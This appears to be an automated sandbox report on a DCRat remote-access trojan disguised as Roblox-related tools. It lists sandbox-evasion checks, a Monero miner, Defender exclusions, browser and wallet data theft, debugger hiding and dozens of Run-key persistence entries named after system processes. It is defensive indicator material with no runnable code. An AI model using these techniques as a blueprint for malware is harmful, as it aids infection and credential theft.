dcrat | 53d6112deaab099a9da782ba5fe8ccf729b2b1328bb0a62afdc9f09f9cd427c6

Virtualization/Sandbox Evasion

T1497

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	cd57e4c171d6e8f5ea8b8f824a6a7316.exe

XMRig Miner payload 8 IoCs

miner

resource	yara_rule
behavioral3/memory/5480-698-0x0000000140000000-0x0000000140786000-memory.dmp	xmrig
behavioral3/memory/5480-700-0x0000000140000000-0x0000000140786000-memory.dmp	xmrig
behavioral3/memory/5480-706-0x0000000140000000-0x0000000140786000-memory.dmp	xmrig
behavioral3/memory/5480-705-0x0000000140000000-0x0000000140786000-memory.dmp	xmrig
behavioral3/memory/5480-704-0x0000000140000000-0x0000000140786000-memory.dmp	xmrig
behavioral3/memory/5480-703-0x0000000140000000-0x0000000140786000-memory.dmp	xmrig
behavioral3/memory/5480-702-0x0000000140000000-0x0000000140786000-memory.dmp	xmrig
behavioral3/memory/5480-3167-0x0000000140000000-0x0000000140786000-memory.dmp	xmrig

Command and Scripting Interpreter: PowerShell 1 TTPs 35 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

pid	Process
2904	powershell.exe
2332	powershell.exe
4536	powershell.exe
5512	powershell.exe
1096	powershell.exe
5740	powershell.exe
5008	powershell.exe
3872	powershell.exe
5560	powershell.exe
4752	powershell.exe
1480	powershell.exe
5548	powershell.exe
420	powershell.exe
5012	powershell.exe
3544	powershell.exe
784	powershell.exe
4912	powershell.exe
4952	powershell.exe
128	powershell.exe
5632	powershell.exe
4752	powershell.exe
1548	powershell.exe
4008	powershell.exe
3848	powershell.exe
1084	powershell.exe
4880	powershell.exe
5712	powershell.exe
1764	powershell.exe
5680	powershell.exe
3288	powershell.exe
1204	powershell.exe
952	powershell.exe
3540	powershell.exe
4608	powershell.exe
3152	powershell.exe

Downloads MZ/PE file

.NET Reactor proctector 1 IoCs

Detects an executable protected by an unregistered version of Eziriz's .NET Reactor.

resource	yara_rule
behavioral3/memory/2556-48-0x0000000000400000-0x0000000000CC7000-memory.dmp	net_reactor

Checks BIOS information in registry 2 TTPs 2 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	cd57e4c171d6e8f5ea8b8f824a6a7316.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	cd57e4c171d6e8f5ea8b8f824a6a7316.exe

Executes dropped EXE 56 IoCs

pid	Process
4604	Result.exe
1852	DCRatBuild.exe
3560	Bloxstrap.exe
3500	Frage build.exe
1540	SolaraBootstrapper.exe
1592	solara.exe
3876	Refcrt.exe
1772	SolaraBootstrapper.exe
4296	ComContainerbrowserRefRuntime.exe
2072	Roblox.exe
5296	fontdrvhost.exe
4276	Bloxstrap.exe
3408	Roblox.exe
1832	sihost64.exe
4280	vc_redist.x64.exe
5676	vc_redist.x64.exe
2036	cd57e4c171d6e8f5ea8b8f824a6a7316.exe
3356	Bloxstrap-v2.5.4.exe
9952	RobloxPlayerBeta.exe
3876	lsass.exe
12048	lsass.exe.exe
1508	RuntimeBroker.exe
12520	Bloxstrap.exe
8100	Bloxstrap-v2.7.0.exe
14216	RobloxPlayerBeta.exe
10368	Registry.exe
10640	dllhost.exe
10104	SolaraBootstrapper.exe
15896	RuntimeBroker.exe
15920	dllhost.exe.exe
15904	RuntimeBroker.exe
15888	SolaraBootstrapper.exe.exe
15912	Registry.exe.exe
15928	RuntimeBroker.exe
14944	RuntimeBroker.exe
14916	dwm.exe
14832	RuntimeBroker.exe
14840	dwm.exe.exe
16188	sihost.exe
16116	RuntimeBroker.exe
16108	sihost.exe.exe
14268	Roblox.exe
9172	conhost.exe
1628	RuntimeBroker.exe
3316	conhost.exe.exe
6304	Bloxstrap.exe
6544	RobloxPlayerBeta.exe
5528	explorer.exe
4232	csrss.exe
2488	explorer.exe.exe
9596	RuntimeBroker.exe
6248	csrss.exe.exe
10012	RuntimeBroker.exe
9644	lsass.exe
10092	lsass.exe.exe
3336	RuntimeBroker.exe

Loads dropped DLL 20 IoCs

pid	Process
5168	MsiExec.exe
5168	MsiExec.exe
5340	MsiExec.exe
5340	MsiExec.exe
5340	MsiExec.exe
5340	MsiExec.exe
5340	MsiExec.exe
2180	MsiExec.exe
2180	MsiExec.exe
2180	MsiExec.exe
5168	MsiExec.exe
5676	vc_redist.x64.exe
2036	cd57e4c171d6e8f5ea8b8f824a6a7316.exe
2036	cd57e4c171d6e8f5ea8b8f824a6a7316.exe
2036	cd57e4c171d6e8f5ea8b8f824a6a7316.exe
2036	cd57e4c171d6e8f5ea8b8f824a6a7316.exe
2036	cd57e4c171d6e8f5ea8b8f824a6a7316.exe
9952	RobloxPlayerBeta.exe
14216	RobloxPlayerBeta.exe
6544	RobloxPlayerBeta.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Themida packer 11 IoCs

Detects Themida, an advanced Windows software protection system.

themida

resource	yara_rule
behavioral3/memory/2036-3620-0x0000000180000000-0x0000000180B57000-memory.dmp	themida
behavioral3/memory/2036-3623-0x0000000180000000-0x0000000180B57000-memory.dmp	themida
behavioral3/memory/2036-3622-0x0000000180000000-0x0000000180B57000-memory.dmp	themida
behavioral3/memory/2036-3621-0x0000000180000000-0x0000000180B57000-memory.dmp	themida
behavioral3/memory/2036-3787-0x0000000180000000-0x0000000180B57000-memory.dmp	themida
behavioral3/memory/2036-3861-0x0000000180000000-0x0000000180B57000-memory.dmp	themida
behavioral3/memory/2036-3894-0x0000000180000000-0x0000000180B57000-memory.dmp	themida
behavioral3/memory/2036-3896-0x0000000180000000-0x0000000180B57000-memory.dmp	themida
behavioral3/memory/2036-3899-0x0000000180000000-0x0000000180B57000-memory.dmp	themida
behavioral3/memory/2036-3912-0x0000000180000000-0x0000000180B57000-memory.dmp	themida
behavioral3/memory/2036-13778-0x0000000180000000-0x0000000180B57000-memory.dmp	themida

Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001

Adds Run key to start application 2 TTPs 34 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\SolaraBootstrapper = "\"C:\\Windows\\Migration\\SolaraBootstrapper.exe\""	Refcrt.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-126710838-2490174220-686410903-1000\Software\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\winNet\\csrss.exe\""	Refcrt.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\sysmon = "\"C:\\Users\\Default\\My Documents\\sysmon.exe\""	Refcrt.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-126710838-2490174220-686410903-1000\Software\Microsoft\Windows\CurrentVersion\Run\explorer = "\"C:\\Program Files (x86)\\Windows Photo Viewer\\en-US\\explorer.exe\""	Refcrt.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-126710838-2490174220-686410903-1000\Software\Microsoft\Windows\CurrentVersion\Run\Registry = "\"C:\\winNet\\Registry.exe\""	Refcrt.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-126710838-2490174220-686410903-1000\Software\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Users\\Default User\\csrss.exe\""	Refcrt.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\winNet\\csrss.exe\""	Refcrt.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\dllhost = "\"C:\\Program Files (x86)\\Internet Explorer\\SIGNUP\\dllhost.exe\""	Refcrt.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-126710838-2490174220-686410903-1000\Software\Microsoft\Windows\CurrentVersion\Run\dwm = "\"C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\dwm.exe\""	Refcrt.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\conhost = "\"C:\\Windows\\security\\database\\conhost.exe\""	Refcrt.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-126710838-2490174220-686410903-1000\Software\Microsoft\Windows\CurrentVersion\Run\conhost = "\"C:\\Windows\\security\\database\\conhost.exe\""	Refcrt.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-126710838-2490174220-686410903-1000\Software\Microsoft\Windows\CurrentVersion\Run\SolaraBootstrapper = "\"C:\\Windows\\Migration\\SolaraBootstrapper.exe\""	Refcrt.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Users\\Default User\\csrss.exe\""	Refcrt.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\sysmon = "\"C:\\Program Files\\Windows Sidebar\\Gadgets\\sysmon.exe\""	Refcrt.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\conhost = "\"C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\conhost.exe\""	Refcrt.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-126710838-2490174220-686410903-1000\Software\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\addins\\csrss.exe\""	Refcrt.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-126710838-2490174220-686410903-1000\Software\Microsoft\Windows\CurrentVersion\Run\sysmon = "\"C:\\Program Files\\Windows Sidebar\\Gadgets\\sysmon.exe\""	Refcrt.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\dwm = "\"C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\dwm.exe\""	Refcrt.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-126710838-2490174220-686410903-1000\Software\Microsoft\Windows\CurrentVersion\Run\RuntimeBroker = "\"C:\\Users\\Admin\\AppData\\Local\\RuntimeBroker.exe\""	Roblox.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\explorer = "\"C:\\Program Files (x86)\\Windows Photo Viewer\\en-US\\explorer.exe\""	Refcrt.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Registry = "\"C:\\winNet\\Registry.exe\""	Refcrt.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\sihost = "\"C:\\Program Files\\Windows NT\\Accessories\\en-US\\sihost.exe\""	Refcrt.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\dllhost = "\"C:\\Recovery\\WindowsRE\\dllhost.exe\""	Refcrt.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-126710838-2490174220-686410903-1000\Software\Microsoft\Windows\CurrentVersion\Run\conhost = "\"C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\conhost.exe\""	Refcrt.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-126710838-2490174220-686410903-1000\Software\Microsoft\Windows\CurrentVersion\Run\sysmon = "\"C:\\Users\\Default\\My Documents\\sysmon.exe\""	Refcrt.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Roblox = "\"C:\\DriversavessessionDlldhcp\\Roblox.exe\""	Roblox.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\addins\\csrss.exe\""	Refcrt.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-126710838-2490174220-686410903-1000\Software\Microsoft\Windows\CurrentVersion\Run\sihost = "\"C:\\Program Files\\Windows NT\\Accessories\\en-US\\sihost.exe\""	Refcrt.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-126710838-2490174220-686410903-1000\Software\Microsoft\Windows\CurrentVersion\Run\dllhost = "\"C:\\Recovery\\WindowsRE\\dllhost.exe\""	Refcrt.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-126710838-2490174220-686410903-1000\Software\Microsoft\Windows\CurrentVersion\Run\dllhost = "\"C:\\Program Files (x86)\\Internet Explorer\\SIGNUP\\dllhost.exe\""	Refcrt.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\RuntimeBroker = "\"C:\\Users\\Admin\\AppData\\Local\\RuntimeBroker.exe\""	Roblox.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-126710838-2490174220-686410903-1000\Software\Microsoft\Windows\CurrentVersion\Run\Roblox = "\"C:\\DriversavessessionDlldhcp\\Roblox.exe\""	Roblox.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-126710838-2490174220-686410903-1000\Software\Microsoft\Windows\CurrentVersion\Run\lsass = "\"C:\\DriversavessessionDlldhcp\\lsass.exe\""	Refcrt.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\lsass = "\"C:\\DriversavessessionDlldhcp\\lsass.exe\""	Refcrt.exe

Blocklisted process makes network request 3 IoCs

flow	pid	Process
9	6096	msiexec.exe
11	6096	msiexec.exe
12	6096	msiexec.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Checks whether UAC is enabled 1 TTPs 1 IoCs

evasion trojan

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	cd57e4c171d6e8f5ea8b8f824a6a7316.exe

Enumerates connected drives 3 TTPs 23 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

Peripheral Device Discovery

T1120

System Information Discovery

description	ioc	Process
File opened (read-only)	\??\A:	msiexec.exe
File opened (read-only)	\??\G:	msiexec.exe
File opened (read-only)	\??\J:	msiexec.exe
File opened (read-only)	\??\L:	msiexec.exe
File opened (read-only)	\??\T:	msiexec.exe
File opened (read-only)	\??\N:	msiexec.exe
File opened (read-only)	\??\U:	msiexec.exe
File opened (read-only)	\??\W:	msiexec.exe
File opened (read-only)	\??\E:	msiexec.exe
File opened (read-only)	\??\K:	msiexec.exe
File opened (read-only)	\??\P:	msiexec.exe
File opened (read-only)	\??\S:	msiexec.exe
File opened (read-only)	\??\V:	msiexec.exe
File opened (read-only)	\??\X:	msiexec.exe
File opened (read-only)	\??\Z:	msiexec.exe
File opened (read-only)	\??\Y:	msiexec.exe
File opened (read-only)	\??\B:	msiexec.exe
File opened (read-only)	\??\H:	msiexec.exe
File opened (read-only)	\??\I:	msiexec.exe
File opened (read-only)	\??\M:	msiexec.exe
File opened (read-only)	\??\O:	msiexec.exe
File opened (read-only)	\??\Q:	msiexec.exe
File opened (read-only)	\??\R:	msiexec.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 7 IoCs

Web Service

T1102

flow	ioc
27	raw.githubusercontent.com
41	raw.githubusercontent.com
42	raw.githubusercontent.com
77	raw.githubusercontent.com
79	raw.githubusercontent.com
203	raw.githubusercontent.com
10	raw.githubusercontent.com

Looks up external IP address via web service 3 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
4	ip-api.com
10	ipinfo.io
15	ipinfo.io

Drops file in System32 directory 2 IoCs

description	ioc	Process
File created	\??\c:\Windows\System32\CSC9083A010E69947F896FE603A096176C.TMP	csc.exe
File created	\??\c:\Windows\System32\_zvky2.exe	csc.exe

Suspicious use of NtCreateThreadExHideFromDebugger 3 IoCs

pid	Process
9952	RobloxPlayerBeta.exe
14216	RobloxPlayerBeta.exe
6544	RobloxPlayerBeta.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 64 IoCs

pid	Process
2036	cd57e4c171d6e8f5ea8b8f824a6a7316.exe
9952	RobloxPlayerBeta.exe
9952	RobloxPlayerBeta.exe
9952	RobloxPlayerBeta.exe
9952	RobloxPlayerBeta.exe
9952	RobloxPlayerBeta.exe
9952	RobloxPlayerBeta.exe
9952	RobloxPlayerBeta.exe
9952	RobloxPlayerBeta.exe
9952	RobloxPlayerBeta.exe
9952	RobloxPlayerBeta.exe
9952	RobloxPlayerBeta.exe
9952	RobloxPlayerBeta.exe
9952	RobloxPlayerBeta.exe
9952	RobloxPlayerBeta.exe
9952	RobloxPlayerBeta.exe
9952	RobloxPlayerBeta.exe
9952	RobloxPlayerBeta.exe
9952	RobloxPlayerBeta.exe
14216	RobloxPlayerBeta.exe
14216	RobloxPlayerBeta.exe
14216	RobloxPlayerBeta.exe
14216	RobloxPlayerBeta.exe
14216	RobloxPlayerBeta.exe
14216	RobloxPlayerBeta.exe
14216	RobloxPlayerBeta.exe
14216	RobloxPlayerBeta.exe
14216	RobloxPlayerBeta.exe
14216	RobloxPlayerBeta.exe
14216	RobloxPlayerBeta.exe
14216	RobloxPlayerBeta.exe
14216	RobloxPlayerBeta.exe
14216	RobloxPlayerBeta.exe
14216	RobloxPlayerBeta.exe
14216	RobloxPlayerBeta.exe
14216	RobloxPlayerBeta.exe
14216	RobloxPlayerBeta.exe
6544	RobloxPlayerBeta.exe
6544	RobloxPlayerBeta.exe
6544	RobloxPlayerBeta.exe
6544	RobloxPlayerBeta.exe
6544	RobloxPlayerBeta.exe
6544	RobloxPlayerBeta.exe
6544	RobloxPlayerBeta.exe
6544	RobloxPlayerBeta.exe
6544	RobloxPlayerBeta.exe
6544	RobloxPlayerBeta.exe
6544	RobloxPlayerBeta.exe
6544	RobloxPlayerBeta.exe
6544	RobloxPlayerBeta.exe
6544	RobloxPlayerBeta.exe
6544	RobloxPlayerBeta.exe
6544	RobloxPlayerBeta.exe
6544	RobloxPlayerBeta.exe
6544	RobloxPlayerBeta.exe
9952	RobloxPlayerBeta.exe
9952	RobloxPlayerBeta.exe
9952	RobloxPlayerBeta.exe
9952	RobloxPlayerBeta.exe
9952	RobloxPlayerBeta.exe
9952	RobloxPlayerBeta.exe
14216	RobloxPlayerBeta.exe
14216	RobloxPlayerBeta.exe
14216	RobloxPlayerBeta.exe

Suspicious use of SetThreadContext 1 IoCs

description	pid	Process	procid_target
PID 5944 set thread context of 5480	5944	conhost.exe	281

Drops file in Program Files directory 64 IoCs

description	ioc	Process
File created	C:\Program Files\nodejs\node_modules\npm\node_modules\minipass-json-stream\node_modules\minipass\index.js	msiexec.exe
File created	C:\Program Files\nodejs\node_modules\npm\man\man7\config.7	msiexec.exe
File created	C:\Program Files\nodejs\node_modules\npm\docs\content\commands\npm-edit.md	msiexec.exe
File created	C:\Program Files\nodejs\node_modules\npm\node_modules\readable-stream\lib\internal\streams\readable.js	msiexec.exe
File created	C:\Program Files\nodejs\node_modules\npm\node_modules\sigstore\dist\x509\asn1\obj.d.ts	msiexec.exe
File created	C:\Program Files\nodejs\node_modules\npm\node_modules\promise-call-limit\index.js	msiexec.exe
File created	C:\Program Files\nodejs\node_modules\npm\node_modules\tar\lib\unpack.js	msiexec.exe
File created	C:\Program Files\nodejs\node_modules\npm\node_modules\@npmcli\package-json\lib\index.js	msiexec.exe
File created	C:\Program Files\nodejs\node_modules\npm\node_modules\tar\lib\extract.js	msiexec.exe
File created	C:\Program Files\nodejs\node_modules\npm\node_modules\depd\lib\compat\event-listener-count.js	msiexec.exe
File created	C:\Program Files\nodejs\node_modules\npm\node_modules\concat-map\example\map.js	msiexec.exe
File created	C:\Program Files\nodejs\node_modules\npm\man\man1\npm-link.1	msiexec.exe
File created	C:\Program Files\nodejs\node_modules\npm\node_modules\semver\classes\comparator.js	msiexec.exe
File created	C:\Program Files\nodejs\node_modules\npm\node_modules\sigstore\dist\ca\index.d.ts	msiexec.exe
File created	C:\Program Files\nodejs\node_modules\npm\node_modules\tuf-js\dist\store.d.ts	msiexec.exe
File created	C:\Program Files\nodejs\node_modules\npm\node_modules\node-gyp\lib\Find-VisualStudio.cs	msiexec.exe
File created	C:\Program Files\nodejs\node_modules\npm\man\man1\npm-whoami.1	msiexec.exe
File created	C:\Program Files\nodejs\node_modules\npm\node_modules\socks\docs\examples\typescript\associateExample.md	msiexec.exe
File created	C:\Program Files\nodejs\node_modules\npm\node_modules\node-gyp\gyp\tools\pretty_gyp.py	msiexec.exe
File created	C:\Program Files\nodejs\node_modules\npm\node_modules\signal-exit\package.json	msiexec.exe
File created	C:\Program Files\nodejs\node_modules\npm\node_modules\sigstore\dist\types\sigstore\__generated__\sigstore_verification.js	msiexec.exe
File created	C:\Program Files\nodejs\node_modules\npm\node_modules\node-gyp\gyp\pylib\gyp\ninja_syntax.py	msiexec.exe
File created	C:\Program Files\nodejs\node_modules\npm\node_modules\p-map\package.json	msiexec.exe
File created	C:\Program Files\nodejs\node_modules\npm\node_modules\columnify\package.json	msiexec.exe
File created	C:\Program Files\nodejs\node_modules\npm\node_modules\@colors\colors\safe.d.ts	msiexec.exe
File created	C:\Program Files\nodejs\node_modules\npm\node_modules\node-gyp\gyp\pylib\gyp\generator\ninja_test.py	msiexec.exe
File created	C:\Program Files\nodejs\node_modules\npm\node_modules\just-diff-apply\index.cjs	msiexec.exe
File created	C:\Program Files\nodejs\node_modules\npm\node_modules\minipass-fetch\lib\response.js	msiexec.exe
File created	C:\Program Files\nodejs\node_modules\npm\node_modules\node-gyp\node_modules\@npmcli\fs\lib\common\owner-sync.js	msiexec.exe
File created	C:\Program Files\nodejs\node_modules\npm\node_modules\tar\lib\get-write-flag.js	msiexec.exe
File created	C:\Program Files\nodejs\node_modules\npm\node_modules\iconv-lite\encodings\tables\eucjp.json	msiexec.exe
File created	C:\Program Files\nodejs\node_modules\npm\node_modules\err-code\package.json	msiexec.exe
File created	C:\Program Files\nodejs\node_modules\npm\node_modules\validate-npm-package-name\LICENSE	msiexec.exe
File created	C:\Program Files\nodejs\node_modules\npm\node_modules\semver\functions\clean.js	msiexec.exe
File created	C:\Program Files\nodejs\node_modules\npm\node_modules\sigstore\dist\util\json.d.ts	msiexec.exe
File created	C:\Program Files\nodejs\node_modules\npm\node_modules\minimatch\package.json	msiexec.exe
File created	C:\Program Files\nodejs\node_modules\npm\lib\commands\cache.js	msiexec.exe
File created	C:\Program Files\nodejs\node_modules\npm\node_modules\tuf-js\dist\error.js	msiexec.exe
File created	C:\Program Files\nodejs\node_modules\npm\node_modules\tar\node_modules\fs-minipass\index.js	msiexec.exe
File created	C:\Program Files\nodejs\node_modules\npm\node_modules\iconv-lite\lib\index.js	msiexec.exe
File created	C:\Program Files\nodejs\node_modules\npm\node_modules\qrcode-terminal\vendor\QRCode\QRMaskPattern.js	msiexec.exe
File created	C:\Program Files\nodejs\node_modules\npm\node_modules\pacote\lib\util\cache-dir.js	msiexec.exe
File created	C:\Program Files\nodejs\node_modules\npm\node_modules\node-gyp\node_modules\minipass-fetch\lib\body.js	msiexec.exe
File created	C:\Program Files\nodejs\node_modules\npm\node_modules\binary-extensions\package.json	msiexec.exe
File created	C:\Program Files\nodejs\node_modules\npm\node_modules\tar\package.json	msiexec.exe
File created	C:\Program Files\nodejs\node_modules\npm\docs\output\commands\npm-exec.html	msiexec.exe
File created	C:\Program Files\nodejs\node_modules\npm\node_modules\diff\dist\diff.min.js	msiexec.exe
File created	\??\c:\Program Files\Windows Sidebar\Gadgets\sysmon.exe	csc.exe
File created	C:\Program Files\nodejs\node_modules\npm\node_modules\node-gyp\node_modules\are-we-there-yet\LICENSE.md	msiexec.exe
File created	C:\Program Files\nodejs\node_modules\npm\node_modules\spdx-correct\LICENSE	msiexec.exe
File created	C:\Program Files\nodejs\node_modules\npm\node_modules\archy\index.js	msiexec.exe
File created	C:\Program Files\nodejs\node_modules\npm\docs\output\commands\npm-restart.html	msiexec.exe
File created	C:\Program Files\nodejs\node_modules\npm\node_modules\minizlib\LICENSE	msiexec.exe
File created	C:\Program Files\nodejs\node_modules\npm\node_modules\color-support\README.md	msiexec.exe
File created	C:\Program Files\nodejs\node_modules\npm\node_modules\socks\build\common\util.js	msiexec.exe
File created	C:\Program Files\nodejs\node_modules\npm\node_modules\mkdirp\package.json	msiexec.exe
File created	C:\Program Files\nodejs\node_modules\npm\node_modules\tuf-js\dist\index.js	msiexec.exe
File created	C:\Program Files\nodejs\node_modules\npm\node_modules\err-code\bower.json	msiexec.exe
File created	C:\Program Files\nodejs\node_modules\npm\node_modules\is-core-module\package.json	msiexec.exe
File created	C:\Program Files\nodejs\node_modules\npm\man\man1\npm-unstar.1	msiexec.exe
File created	C:\Program Files\nodejs\node_modules\npm\node_modules\node-gyp\node_modules\nopt\README.md	msiexec.exe
File created	C:\Program Files\nodejs\node_modules\npm\node_modules\@npmcli\git\lib\find.js	msiexec.exe
File created	C:\Program Files\nodejs\node_modules\npm\node_modules\node-gyp\node_modules\minimatch\package.json	msiexec.exe
File created	C:\Program Files\nodejs\node_modules\npm\node_modules\agent-base\dist\src\index.d.ts	msiexec.exe

Drops file in Windows directory 35 IoCs

description	ioc	Process
File opened for modification	C:\Windows\Installer\e5806f0.msi	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI1AE9.tmp	msiexec.exe
File created	\??\c:\Windows\security\database\CSCD83EB11C8955475DBA43DCED9A448C3C.TMP	csc.exe
File created	\??\c:\Windows\Migration\SolaraBootstrapper.exe	csc.exe
File opened for modification	C:\Windows\Installer\MSIB636.tmp	msiexec.exe
File created	C:\Windows\Migration\SolaraBootstrapper.exe	Refcrt.exe
File opened for modification	C:\Windows\Installer\MSIB450.tmp	msiexec.exe
File created	C:\Windows\Installer\e5806f4.msi	msiexec.exe
File opened for modification	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log	msiexec.exe
File created	C:\Windows\Installer\inprogressinstallinfo.ipi	msiexec.exe
File created	C:\Windows\SystemTemp\~DF8DBE155B7E9BF869.TMP	msiexec.exe
File created	\??\c:\Windows\Migration\CSCE7BCA4546D6B4965AD1BAE6EDF2479A7.TMP	csc.exe
File opened for modification	C:\Windows\Installer\MSI800E.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\	msiexec.exe
File opened for modification	C:\Windows\Installer\MSIB3A3.tmp	msiexec.exe
File created	C:\Windows\addins\886983d96e3d3e	Refcrt.exe
File created	C:\Windows\Migration\1143e5710f078d	Refcrt.exe
File created	C:\Windows\Installer\e5806f0.msi	msiexec.exe
File created	C:\Windows\Installer\SourceHash{EFA235B5-C6A1-42E6-9BC9-02A8D56F1CDC}	msiexec.exe
File created	\??\c:\Windows\security\database\conhost.exe	csc.exe
File created	C:\Windows\Installer\{EFA235B5-C6A1-42E6-9BC9-02A8D56F1CDC}\NodeIcon	msiexec.exe
File created	C:\Windows\SystemTemp\~DF132414F52CF24522.TMP	msiexec.exe
File created	C:\Windows\addins\csrss.exe	Refcrt.exe
File opened for modification	C:\Windows\Installer\MSI1047.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI1096.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI10A7.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI2BC2.tmp	msiexec.exe
File created	C:\Windows\security\database\conhost.exe	Refcrt.exe
File created	C:\Windows\security\database\088424020bedd6	Refcrt.exe
File created	C:\Windows\SystemTemp\~DF2D2BC898B3771456.TMP	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI802F.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSIB7CD.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI2C50.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\{EFA235B5-C6A1-42E6-9BC9-02A8D56F1CDC}\NodeIcon	msiexec.exe
File created	C:\Windows\SystemTemp\~DF35B6D048AFD83656.TMP	msiexec.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Enumerates system info in registry 2 TTPs 6 IoCs

Query Registry

System Information Discovery

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedgewebview2.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedgewebview2.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedgewebview2.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe

Modifies data under HKEY_USERS 18 IoCs

description	ioc	Process
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationGlassAttribute = "1"	LogonUI.exe
Key deleted	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26	msiexec.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Themes\History	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\StartColorMenu = "4290799360"	LogonUI.exe
